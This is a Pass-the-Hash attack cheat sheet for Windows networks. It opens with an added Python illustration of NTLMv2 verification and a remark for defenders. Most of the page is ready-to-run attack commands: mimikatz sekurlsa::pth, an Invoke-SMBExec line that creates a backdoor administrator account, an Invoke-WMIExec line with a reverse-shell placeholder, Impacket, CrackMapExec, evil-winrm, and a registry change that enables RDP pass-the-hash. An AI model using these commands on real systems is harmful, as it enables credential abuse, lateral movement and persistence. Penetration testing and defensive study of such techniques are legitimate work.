Pass-The-Hash (for Linux & Windows)

Pass The Hash

A Pass the Hash (PTH) attack uses a password hash in place of the password itself for authentication, so the attacker never needs to crack the hash to recover the plaintext. PTH works because NTLM authentication accepts the NT hash directly as the credential, and that hash stays the same for every session until the password is changed.
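To show why a stolen NT hash is password-equivalent (and why only a password change revokes it), here is an added example that is not part of the original page: the NTLMv2 proof computation from MS-NLMP, written from the verifier's point of view. The NT hash, user, domain and the simplified temp blob are constructed sample values; no network code is involved.

```python
import hashlib
import hmac
import os

# Constructed sample values (not from the page): the NT hash the domain
# controller stores for the account, and the names used in one NTLMv2 exchange.
# In real NTLM the NT hash is MD4(UTF-16LE(password)); here it is an opaque key,
# because neither side ever needs the password itself.
NT_HASH = bytes.fromhex("0123456789abcdef0123456789abcdef")  # constructed
USER, DOMAIN = "rio", "CORP"


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 (MS-NLMP 3.3.2): HMAC-MD5 keyed with the NT hash over
    UTF-16LE(UPPER(user) + domain). The only secret input is the hash."""
    data = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash, data, hashlib.md5).digest()


def nt_proof(nt_hash: bytes, user: str, domain: str,
             server_challenge: bytes, temp: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || temp); temp is the
    client's blob (timestamp, client nonce, target info)."""
    key = ntowf_v2(nt_hash, user, domain)
    return hmac.new(key, server_challenge + temp, hashlib.md5).digest()


def client_respond(nt_hash, user, domain, server_challenge):
    """Client side: build a simplified, constructed temp blob and the proof.
    A client holding only the hash (the PTH situation) can do this."""
    temp = (b"\x01\x01" + b"\x00" * 6            # RespType, HiRespType, reserved
            + (0).to_bytes(8, "little")          # timestamp (zeroed for the sample)
            + os.urandom(8)                      # client challenge
            + b"\x00" * 4)                       # reserved; AvPairs omitted
    return temp, nt_proof(nt_hash, user, domain, server_challenge, temp)


def server_verify(stored_nt_hash, user, domain, server_challenge, temp, proof):
    """Verifier side: the DC recomputes the proof from the hash it stores and
    compares in constant time. It never learns or needs the password."""
    expected = nt_proof(stored_nt_hash, user, domain, server_challenge, temp)
    return hmac.compare_digest(expected, proof)


def demo():
    """Returns (accepted with current hash, accepted after password rotation)."""
    challenge = os.urandom(8)                    # ServerChallenge from CHALLENGE_MESSAGE
    temp, proof = client_respond(NT_HASH, USER, DOMAIN, challenge)
    accepted = server_verify(NT_HASH, USER, DOMAIN, challenge, temp, proof)
    # A password change gives the account a new stored hash; the old one stops working.
    rotated = bytes.fromhex("fedcba9876543210fedcba9876543210")  # constructed new hash
    after_rotation = server_verify(rotated, USER, DOMAIN, challenge, temp, proof)
    return accepted, after_rotation


if __name__ == "__main__":
    print(demo())
```

The practical consequence for defenders is in `demo()`: every fresh challenge is answered correctly by whoever holds the hash, so session-level controls do not expire a stolen hash; credential rotation (and keeping hashes out of reachable LSASS memory) is what ends it.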


Windows PTH

Mimikatz

mimikatz.exe privilege::debug "sekurlsa::pth /user:rio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:{DOMAIN} /run:cmd.exe" exit

Explanation:

  • privilege::debug - requests SeDebugPrivilege for the mimikatz process (it must already run in an elevated/administrator context); this privilege is needed to interact with LSASS

  • /user:rio - the user to impersonate (the account the hash belongs to)

  • /rc4 or /ntlm - the NT hash of the user's password. The two switches are aliases, because the NT hash is also the RC4-HMAC key used by Kerberos

  • /domain - The domain to which the user being impersonated belongs. For a local user account, you can use the computer name, localhost, or simply a dot (.)

  • sekurlsa::pth - the pth command of mimikatz's sekurlsa module (the module that works with credential material held in LSASS); it starts the process in a new logon session and patches the supplied hash into that session's NTLM credential

  • /run:cmd.exe - the program mimikatz launches in the new session after injecting the hash (defaults to cmd.exe)

Invoke-TheHash

Besides mimikatz, Invoke-TheHash can be used for PTH on Windows. It is a set of PowerShell functions that perform Pass the Hash over WMI and SMB; authentication is done by passing the NTLM hash into the NTLMv2 authentication protocol.

Import-Module .\Invoke-TheHash.psd1

  • SMB

Invoke-SMBExec -Target 13.13.13.13 -Domain corp.local -Username rio -Hash 12379N1D2YV31U20931C031 -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose

  • WMI

Invoke-WMIExec -Target DC01 -Domain {DOMAIN} -Username rio -Hash 12379N1D2YV31U20931C031 -Command "powershell -e JUSTLETSIMAGINETHISISBASE64ENCODEDPOWERSHELLREVERSESHELLCODE=="

Linux PTH

Impacket

Impacket has a lot of useful tools; for this purpose we need only psexec, though wmiexec, atexec and smbexec work the same way. The -hashes argument takes LMHASH:NTHASH, so the leading colon leaves the LM part empty.

impacket-psexec administrator@13.13.13.13 -hashes :12379N1D2YV31U20931C031
impacket-wmiexec administrator@13.13.13.13 -hashes :12379N1D2YV31U20931C031

CrackMapExec

crackmapexec smb 13.13.13.13 -u Administrator -d . -H 12379N1D2YV31U20931C031 -x whoami

Evil-winrm

evil-winrm -i 13.13.13.13 -u Administrator -H 12379N1D2YV31U20931C031

RDP

Restricted Admin mode for RDP is disabled by default, so it has to be enabled first on the target host by adding the DisableRestrictedAdmin registry value (DWORD 0) under the Lsa key:

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Then use xfreerdp with /pth to pass the hash:

xfreerdp /v:13.13.13.13 /u:rio /pth:12379N1D2YV31U20931C031
